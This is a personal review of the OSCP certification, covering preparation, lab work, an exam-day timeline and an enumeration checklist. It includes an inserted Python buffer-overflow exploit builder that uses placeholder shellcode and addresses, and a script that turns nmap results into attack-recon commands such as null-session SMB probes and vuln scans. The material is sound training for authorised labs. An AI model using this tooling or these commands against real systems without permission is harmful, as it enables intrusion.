OSCP (Offensive Security Certified Professional), earned through the Penetration Testing with Kali Linux course, is a certification offered by Offensive Security. It is considered one of the most challenging certifications in the field of cyber security and is aimed at people who want to grow in the domain of penetration testing. In this review I am going to share my OSCP experience, the way I prepared for the exam, my prior knowledge and the cheat sheets I used for the exam, so that you have a clear idea of what is necessary before digging into OSCP.
For my OSCP review, well, for starters: I have a little background in the security domain. I am a postgraduate in cyber security and have been interested in hacking for many years, but I am a noob who hasn't really worked on exploitation.
Before getting into the OSCP exam itself, I'll share some info on the OSCP lab and prerequisites. I had been planning to take OSCP since March 2019 and felt like I needed to learn a lot before going into it. So, in August I bought HackTheBox VIP and started cracking boxes. All the resources on the internet stated that HTB is very useful for OSCP, and I felt the same. Later I researched a lot about the OSCP certification, and everyone says it's freaking hard; reading all those reviews got me very excited and I scheduled my lab to start from Dec 22nd.
Who should take OSCP?
If you ask me that question, I would say whoever is interested in technology or working in the security domain. It helps you a lot in terms of knowledge and understanding of the low-level details of security and hacking. It helps you adopt a hacker's mindset and you will learn the way hackers break into an enterprise environment. If you are working in a red team, this is the certification to start with. If you are tech-savvy it is going to be very easy and interesting. Also, the best thing about OSCP is that once you are an OSCP, you are always an OSCP: there is no expiration date on the certification.
100% yes. As the threat landscape keeps growing, every security analyst and expert should have a basic understanding of how attackers think and how they start their attack process. If you are a beginner, it's going to be super fun to learn new technologies and attack techniques. Even if you are not a red teamer, there is no harm in learning red team techniques, as you can use them to secure your own company.
Is OSCP difficult?
Well, it's not for me to decide; it depends on your prior experience and on your definition of difficulty. I personally didn't find it too hard, maybe because I prepared well before taking the OSCP lab. If you are a complete beginner, take your time to learn some basics and complete the prerequisites stated below, and you are good to go with the 60-day or 90-day lab, so that you can sit tight and learn everything peacefully at your own pace. Nothing is too hard until you try and succeed.
OSCP pricing:
As I had worked on HackTheBox a lot (I cracked around 65 boxes there), I opted for the 30-day lab, which cost $800. The pricing has since changed: it is now $1000 for 30 days including one exam attempt. It's up to you to choose the number of days; the price goes up by $200 for every additional 30 days.
Prerequisites for enrolling in OSCP:
· Never give up
· Basic understanding of networking
· Knowledge of bash scripting would be very helpful to automate petty tasks
· Basic understanding of assembly language and buffer overflow attacks
· Knowledge of web penetration testing, like XSS and SQL injection
· Using reverse shells (very important)
· Windows and Linux commands (very important)
My personal list of OSCP-like boxes from HackTheBox: Lame, Shocker, Nibbles, SolidState, Valentine, Poison, Irked, October, SecNotes, Bounty, Arctic, Bastion, RedCross, Active, Bart, Jeeves
How to prepare for OSCP before buying the lab:
If you have no prior knowledge of penetration testing, I would suggest you start by solving capture the flag challenges; the more you do, the better, as this is how you get accustomed to new technologies, applications and tools. There are a lot more advantages to CTFs than you can imagine. I personally started with OverTheWire (Bandit, Natas and onwards), then moved on to HackTheBox challenges, Root Me and pwnable.kr.
The final and most important thing to learn is the buffer overflow. To understand Win32 and Linux 32-bit buffer overflows better, try to understand the basics of assembly; that grounding will help you a lot in the exploit development phase. Learn to exploit SLMail 5.5 manually and properly.
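As an added example (my own code, not from the original post and not from Offensive Security's course material), here is the bookkeeping side of the manual 32-bit stack overflow method referred to above: generating a cyclic pattern to recover the EIP offset from the crash, generating the bad-character test string, checking a payload for bad bytes, and assembling the final buffer. The EIP value 0x39694438, the JMP ESP address 0x10203040, the bad-character set and the INT3 "shellcode" are constructed placeholders; on a real target the EIP value comes from the debugger after the crash, the address from a module without ASLR/rebasing (for example via `!mona jmp -r esp` in Immunity Debugger) and the shellcode from msfvenom with the bad characters excluded.

```python
import itertools
import string
import struct

# Metasploit-style cyclic pattern: Aa0Aa1Aa2 ... Every 4-byte window is unique
# within the first 20280 bytes, which is what makes the EIP offset recoverable.
def cyclic_pattern(length: int) -> bytes:
    out = bytearray()
    while len(out) < length:
        for up, lo, dg in itertools.product(string.ascii_uppercase,
                                            string.ascii_lowercase,
                                            string.digits):
            out += f"{up}{lo}{dg}".encode()
            if len(out) >= length:
                break
    return bytes(out[:length])


# EIP as shown by the debugger (e.g. 0x39694438) is a little-endian load of the
# four pattern bytes that overwrote the saved return address, so pack it "<I"
# and search for those bytes. Returns None if the value is not from the pattern
# (which usually means EIP was not overwritten by your buffer at all).
def find_offset(pattern: bytes, eip: int):
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    return None if idx < 0 else idx


# Bad-character test string: every byte 0x01..0xff except the ones already
# found to be mangled. 0x00 is left out by default because it ends C strings;
# send this after the return address and compare the stack dump byte by byte.
def badchar_test_string(exclude=frozenset({0x00})) -> bytes:
    return bytes(b for b in range(1, 256) if b not in exclude)


# Which bytes of a payload (e.g. msfvenom output) the target cannot accept.
def contains_badchars(payload: bytes, badchars) -> set:
    return {b for b in payload if b in badchars}


# Final buffer: junk up to the saved EIP, the JMP ESP address (little-endian),
# a short NOP sled so the encoder's decoder stub does not clobber itself while
# it unpacks on the stack, then the shellcode. Refuses to build a buffer whose
# address or shellcode contains a bad character.
def build_exploit(offset: int, jmp_esp: int, shellcode: bytes,
                  badchars=frozenset({0x00}), nops: int = 16) -> bytes:
    ret = struct.pack("<I", jmp_esp)
    for chunk in (ret, shellcode):
        bad = contains_badchars(chunk, badchars)
        if bad:
            raise ValueError(f"bad characters present: {sorted(bad)}")
    return b"A" * offset + ret + b"\x90" * nops + shellcode


if __name__ == "__main__":
    pattern = cyclic_pattern(3000)
    offset = find_offset(pattern, 0x39694438)   # constructed EIP value from a crash
    print("EIP offset:", offset)
    badchars = {0x00, 0x0a, 0x0d}               # assumed for a line-based text protocol
    print("badchar test string length:", len(badchar_test_string(badchars)))
    # placeholder JMP ESP address and placeholder shellcode (four INT3s)
    buf = build_exploit(offset, 0x10203040, b"\xcc" * 4, badchars)
    print("exploit buffer length:", len(buf))
```

The order of operations matters: fuzz until it crashes, send the pattern, read EIP and compute the offset, confirm control of EIP with four distinctive bytes, then find bad characters before you generate shellcode, because every bad byte you miss shows up later as a shell that never calls back.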
When you buy the OSCP lab, you get 16 hours of video material plus an 853-page PDF which covers all the OSCP topics. You can find the full list of OSCP topics here.
The main objective of cracking the machines is to capture the proof.txt file from each machine. It is located in the root directory of the machine, and only an Administrator or the root user can view it. If you got the proof.txt of a machine, that means you cracked that machine.
I started my lab on Dec 22nd, hoping to crack a lot of machines on the first day. I was able to crack my first box in an hour, and then I got lost in the domain. The first step of hacking is reconnaissance, which I skipped: I just randomly selected the first machine, tried exploiting it and luckily it was a success. Now I didn't know what to do, so I remembered the Cyber Kill Chain framework which I had learned in my college days, started with reconnaissance and slowly grasped the techniques, as it was my first time seeing a hell of a lot of vulnerable machines in the same domain right in front of me. I went through all the videos and the PDF they provided in the first few days while cracking boxes simultaneously. So, first make sure you read the whole PDF and go through the videos, but don't spend too much time only reading the docs; work on the lab at the same time.
The OSCP lab environment consists of 4 departments. Only the first department is accessible at first; the more you crack, the more departments become accessible to you. The keys to these departments are hidden in a few boxes. Unlocking them grants you access to new machines, new challenges and new hacks.
My goal was to crack all the machines in 30 days, but I have my office job (9 hours). So, I cut my sleep to 6 hours, which I felt was more than enough, leaving 6 hours a day for the lab, which I did. I worked on the lab for almost 25 days; for the remaining 5 days I didn't get a chance to touch the lab because of office work. I cracked 46 machines in 28 days and still had 2 days left. There are lab PDF challenges: if you solve all of them, document each and every challenge and send the write-up along with your exam report, Offensive Security awards you 5 bonus points. These 5 points are a life saver: if you get 65 points in the exam and have submitted your lab report, you pass. As I had 2 days left and was not in the mood to crack machines, I started working on the PDF challenges. I would have missed a lot if I hadn't worked on them; there is a lot to learn from the PDF they provide. I covered all the challenges in the last 2 days, and it easily took me around 20 to 25 hours to solve and document all of them. Do not leave the PDF challenges to the end; please start them from day 1, as you can learn a lot from the docs and videos Offensive Security provides. In fact everything covered in the docs and videos is used in the OSCP lab.
If you are not working in a red team, or if you don't have prior experience in penetration testing, I personally recommend you take either the 60-day or the 90-day lab and explore more of the network. There is always more to enumerate. If you are stuck anywhere you can contact the OSCP support staff; they are more of a "try harder" gang and will try to guide you without giving you the answer.
· Read and complete all the challenges given in the PDF; it's very helpful
· Make notes of all the machines you crack
· Make your own cheat sheet
· Automate petty tasks; learn to use bash and PowerShell
· Practice reporting on the machines you crack
What you can learn in OSCP
· Various Windows and Linux command-line tools
· Bash and PowerShell scripting
· Reverse shells and bind shells
· Passive and active reconnaissance, port scanning, basic enumeration
· Vulnerability scanning and assessment
· Exploiting web-based vulnerabilities
· Binary exploitation: Windows and Linux buffer overflows (my favourite)
· Client-side attacks
· Exploiting known vulnerabilities using publicly available exploits
· File transfers
· Anti-virus evasion
· Windows and Linux privilege escalation
· Password attacks
· Port redirection and tunnelling (pivoting)
· Active Directory attacks (new)
· Metasploit and PowerShell Empire
OSCP exam: my story
As everyone knows, the OSCP exam consists of 5 boxes: two 20-point machines, two 25-point machines (one of which is the buffer overflow) and one 10-point box, which sums to a total of 100 points, and you need 70 points to pass.
So, what's the best bet here? My plan was to go for the 25-point buffer overflow machine first, then the 10-point box (the easiest machine in the exam, and the trickiest as well), then both 20-point machines and finally the other 25-point machine.
I planned on taking the exam as soon as possible after my lab expired on Jan 21st. So, I logged into the exam portal and was shocked to find there was no slot available for 20 days. Crazy, right? The OffSec calendar was fully booked. I am more of a night guy and was looking to start the exam in the evening, so I booked it for 2:30 PM on Feb 18th.
The moment of truth arrived, the day of the exam. As usual I woke up late (11:30 AM), got ready for the exam and started 30 minutes early for document verification and so on. That took around 30 minutes; my exam was supposed to start at 2:30 PM and I was waiting for the OffSec team to send me the VPN pack. I waited and waited, and past 3:00 PM I texted the proctor that I hadn't received the VPN for the exam. The proctor asked me to contact support, and when I contacted support I received the VPN within 5 to 10 minutes, at almost 3:10 PM I guess. I had lost 30 minutes of my exam and was tense for a minute, but I calmed down after a while and read through all the info presented.
Timeline:
3:30 PM: started my port scans on all the machines. It's never good to rush. I took everything step by step as planned. I started with the buffer overflow and faced some challenges.
5:00 PM: cracked my first machine and carefully submitted the proof.txt. I took a deep breath, started reading my port scan report and started on the 10-point box; it was very tricky, as expected.
6:19 PM: cracked the 10-point box, faster than expected. Now, my actual plan was to go after the 20-point boxes, but when I went through the nmap scan report of the other 25-point box I felt I could crack it and started on it.
7:20 PM: got the initial shell on the other 25-point box. I was jumping with joy as I had 25+10+12.5=47.5 points, and my feeling was that all I needed was to crack only one 20-point box to pass, as I had the lab report ready (5 bonus points). Now, as I had deviated from my exam plan, I wanted to go back to my original plan of going after the 20-point boxes first before going after the 2nd 25-point box. So, I stopped on the 25-point box after getting the initial shell and started working on the first 20-point box.
8:43 PM: got the initial shell on the first 20-point box.
9:00 PM: rooted the 20-point box and submitted the flag. I got up, walked for a few minutes and ate something.
9:15 PM: started the 2nd 20-point box.
10:30 PM: got the initial flag. Now I was confident that I had passed the exam (25+12.5+10+20+10). I took a dinner break here for around 30 to 45 minutes.
11:10 PM: back in the game.
11:43 PM: rooted the 2nd 20-point box. End of game: I had 87.5 points + 5 bonus points (assumed). I didn't want to strain myself any more, so I took a long break and chilled. I still had 13 hours left in the exam + 24 hours for report writing. 70% of the time I played music to calm myself down.
1:00 AM: report writing. As screen recording is not allowed, I started writing my report.
3:00 AM: slept for 5 to 6 hours.
9:00 AM: started working on privilege escalation on the 25-point box. It was an unsuccessful attempt though; I was unable to crack it.
12:00 PM: lost the connection to the OffSec VPN for an hour. So, I sent an email to the OffSec team and they extended my lab by an hour and a half. That was great, as I got more time to work on my report writing.
4:00 PM: lab ended.
5:00 AM (following day): I submitted my report the next day and slept peacefully.
28th Feb, 2:00 AM: I got an email from OffSec saying I had passed the exam, and officially I am an OSCP now. That was a very great journey; I enjoyed every moment of the exam, even more than the lab. Thank you OffSec for such a great experience, and thanks to my family, who supported and helped me in every way possible to achieve this.
1. Check the machine IPs
   a. Start a timer (don't stay on a single machine for too long)
   b. Cracked a machine? Restart the timer
2. Start with the buffer overflow
   a. Start NmapAutomator on all 4 other machines before starting the BOF, so the scans run while you work
3. Take screenshots of everything
4. Start with the 10-point box after the BOF (25 points). If it is taking too long, switch to a new box and come back to it later. Document everything.
5. HTTP is vulnerable most of the time, so start with HTTP:
   · Start nikto, dirb, dirsearch, dirbuster (with extensions)
   · Check robots.txt, config.php, license.txt
   · Try default creds. If they don't work, search for creds for some time and then move on to the next step, as it might be a rabbit hole
   · Try cewl and use the wordlist it produces for brute forcing
   · Check the running application version
   · Google the application to find the version and exploits
   · Don't just rely on searchsploit; search on Google as well
   · Check GitHub for exploits as well, and read the exploit properly before running it
   · Run wpscan or droopescan if WordPress or Drupal is found; search for vulnerable plugins and the version
   · Search for LFI/RFI; if in doubt, check the PDF/videos
   · Check for SQL injection
   · Check for Tomcat, web.config and cgi-bin exploits
6. Check all ports: do a full nmap port scan if you think something is missing
7. Don't work on a single port for too long.
8. Remember, sometimes you cannot fully exploit a box with just one vulnerability; you might need to chain another vuln to get all the way.
9. Always run the nmap vuln scripts
10. Ippsec.rocks: search for the vulnerability here
11. Check the SMB port
   a. If a Linux machine has SMB, check the Samba version and exploit it
   b. Use smbclient without a password (null login) as well
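As an added example (written for this review, not the author's own tooling and not part of NmapAutomator), here is a small Python triage script that turns an nmap grepable (-oG) scan into the follow-up commands from the checklist above, in the checklist's order: HTTP first, then SMB, then version research, then the nmap vuln scripts and a full port sweep in case the first scan missed something. It only prints the commands; you review and run them yourself. The scan output is constructed, the host 10.11.1.5 is made up, and the tool invocations (nikto, dirb, curl, smbclient, rpcclient, searchsploit, nmap) assume a standard Kali install.

```python
import re
import shlex

# Constructed nmap -oG (grepable) output for one lab host; not real scan data.
# Each port entry is port/state/proto/owner/service/rpcinfo/version/ and nmap
# writes "|" instead of "/" inside a field (so ssl/http becomes ssl|http).
SAMPLE_GNMAP = (
    "# Nmap scan initiated (constructed sample)\n"
    "Host: 10.11.1.5 ()\tStatus: Up\n"
    "Host: 10.11.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2/, "
    "80/open/tcp//http//Apache httpd 2.4.18/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X/, "
    "445/open/tcp//netbios-ssn//Samba smbd 3.X/, "
    "443/open/tcp//ssl|http//Apache httpd 2.4.18/, "
    "8080/filtered/tcp//http-proxy///\tIgnored State: closed (65529)\n"
)

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*?)(?:\t|$)")
HTTP_SERVICES = {"http", "http-alt", "http-proxy", "https", "ssl|http", "ssl|https"}


def parse_gnmap(text):
    """Return {host: [(port, service, version), ...]} for open TCP ports only."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        host, ports = m.group(1), m.group(2)
        for entry in ports.split(", "):
            f = entry.split("/")
            if len(f) < 7 or f[1] != "open" or f[2] != "tcp":
                continue  # filtered/closed ports are noise at this stage
            hosts.setdefault(host, []).append((int(f[0]), f[4], f[6]))
    return hosts


def plan_followups(hosts):
    """Turn parsed open ports into the checklist's follow-up commands, HTTP first."""
    plan = {}
    for host, ports in hosts.items():
        cmds = []
        # 5. HTTP first: scanners, common files, then version research.
        for port, service, _ in ports:
            if service in HTTP_SERVICES:
                scheme = "https" if service.startswith("ssl") or service == "https" else "http"
                url = f"{scheme}://{host}:{port}/"
                cmds += [f"nikto -h {url}",
                         f"dirb {url} -X .php,.txt,.html",
                         f"curl -sk {url}robots.txt"]
        # 11. SMB: null-session listing, rpcclient, and the smb-vuln* scripts.
        smb = [str(p) for p, _, _ in ports if p in (139, 445)]
        if smb:
            cmds += [f"smbclient -N -L //{host}",
                     f"rpcclient -U '' -N {host} -c srvinfo",
                     f"nmap --script 'smb-vuln*' -p{','.join(smb)} {host}"]
        # Version research for every fingerprinted service (searchsploit here;
        # Google and GitHub by hand, since searchsploit alone is not enough).
        for version in dict.fromkeys(v for _, _, v in ports if v):
            cmds.append(f"searchsploit {shlex.quote(version)}")
        # 9 and 6. nmap vuln scripts on what is open, then a full port sweep.
        open_ports = ",".join(str(p) for p, _, _ in ports)
        cmds += [f"nmap -sV --script vuln -p{open_ports} {host}",
                 f"nmap -p- -T4 -oG full-{host}.gnmap {host}"]
        plan[host] = cmds
    return plan


if __name__ == "__main__":
    for host, cmds in plan_followups(parse_gnmap(SAMPLE_GNMAP)).items():
        print(f"# {host}")
        for c in cmds:
            print(c)
```

Feed it the .gnmap file NmapAutomator (or `nmap -oG`) writes for each exam host, and treat the output as a to-do list rather than a pipeline: the point of the checklist is to keep you moving between ports and boxes, and a script that blindly runs everything hides which step actually found the way in.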
Resources:
Prerequisites
3) Ippsec.rocks: if you want to learn how to exploit something, search here
Pivoting:
Windows privilege escalation:
Linux privilege escalation:
Exploits:
Buffer overflow:
Active Directory penetration testing:
Others
Finally, OSCP is something that all penetration testers and aspiring penetration testers must do. I am really glad I took the OSCP exam; it was so much fun and exciting, and I enjoyed every moment of the lab and the exam. If you are new to red teaming or penetration testing, there is a hell of a lot to learn here, but don't treat it as just an exam or a certification: OSCP is a journey towards trying harder and never giving up on anything. The more you try, the more you enjoy and learn. If you give up halfway, you will lose a lot. OSCP doesn't cover advanced topics, but there is a lot to learn from the basics as well. OSCP can be a turning point in the way you see security.
I thank my family, the Offensive Security team, HackTheBox and Ippsec; I learnt a lot from you all and will keep learning 😊